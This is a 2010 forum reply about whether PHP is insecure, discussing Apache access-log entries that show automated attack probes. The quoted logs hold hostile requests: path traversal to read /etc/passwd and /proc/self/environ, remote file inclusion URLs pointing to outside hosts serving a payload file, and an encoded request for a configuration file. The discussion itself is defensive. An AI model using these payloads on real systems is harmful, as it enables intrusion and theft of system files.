| Re: Shocking amount of PHP security holes? [message #171094 is a reply to message #171084] |
Fri, 24 December 2010 15:56   |
Erwin Moller
Messages: 228
Registered: September 2010
Karma:
|
Senior Member |
|
|
On 12/23/2010 10:25 PM, Ignoramus30015 wrote:
> On 2010-12-23, Norman Peelman<npeelman(at)cfl(dot)rr(dot)com> wrote:
>> Ignoramus30015 wrote:
>>> I have been looking at my apache logs, and I see a tremendous amount
>>> of queries that clearly are attempts to hack me.
>>>
>>> One typical example
>>>
>>> 87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com
>>>
>>
>> In this case apache returned a '404 Page not found'
>
> Yes, because I do not have index.php. The attacker was probing,
> hopeful to find it.
>
>>> Many other examples about, where attackers try to override system
>>> variables with web-supplied parameters. Kind of overriding PATH or
>>> LD_LIBRARY_PATH variables to subvert setuid programs.
>>>
>>> My main question is WTF? Why exactly does PHP let remote web users
>>> override those variables?
>>>
>>
>> Can you supply an example of this?
>
> Here are some from logs of algebra.com:
>
> 64.50.163.80 - - [23/Dec/2010:12:33:30 -0600] "GET /algebra/homework/Sequences-and-series//download.php?view.195/contact.php=I PCop../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 542 "-" "libwww-perl/5.837" www.algebra.com
> 109.72.95.75 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://www.asdsingapore.com/includes/domit/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 209.62.76.194 - - [22/Dec/2010:07:09:14 -0600] "GET /algebra//dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 76.12.154.99 - - [22/Dec/2010:07:11:08 -0600] "GET //dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 24.173.234.213 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C %75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 " http://algebra.com/admin/file_manager.php/login.php?action=download&fil ename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70" "Mozilla/4.0 (compatible;
>
Hello,
That means nothing.
That is just some bot trying to get into poorly configured systems.
My apache access logs are filled with attempts to run dll's and stuff
that breaks into IIS.
Does that mean my Apache/PHP is poorly configured? Of course not: It
just means that the scriptkiddies that run their 'hackorzz' scanning
software are just shooting a million times, and sometimes hit bullseye
on accident.
If you don't know about filepermissions, read/write/execute and stuff
like that, it is better to NOT set up a PHP system indeed. If you do
know about Unix administration you are fine to run PHP.
That is: if PHP runs under Apache. In case people use IIS, who needs to
break into the system via PHP anyway?. (I never used anything else than
Apache / IIS and Tomcat).
In Apache PHP has often the rights of a user named www-data (or 'nobody'
or 'apache').
Take for example this one you posted:
87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET
/manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00
HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9
sun4u; X11)" my.site.com
It is clearly an attempt to steal passwd file from /etc/passwd.
Why a passwd file is typically readable for all users/processes on the
system, it shouldn't be wide open for the world at large.
I don't know what /manuals/index.php is supposed to do in this hack
attempt, but apparently the ?bi=xxx is a way to request a file.
Now, if this index.php is written by an idiot, chances are that it will
fetch anything requested.
This is NOT a problem with PHP, this is a problem with with running crap
software. The same can happen with *any* serverside language.
The script that runs at the server simply has the userrights of the user
it is running as.
So while I think you are wise not to run everything on your server (be
it PHP or ASP/VBscript or Perl or Java or Ruby or Python), it is a
strange thing to say this is a PHP only problem.
About the ENV being screwed up by PHP by just calling some crafted URL:
I don't think that is possible at all.
If you have an example of this: please post more information, since I am
curious.
Regards,
Erwin Moller
--
"There are two ways of constructing a software design: One way is to
make it so simple that there are obviously no deficiencies, and the
other way is to make it so complicated that there are no obvious
deficiencies. The first method is far more difficult."
-- C.A.R. Hoare
|
|
|
|
Calendar
Search
Help
Members
Register
Login
Home
]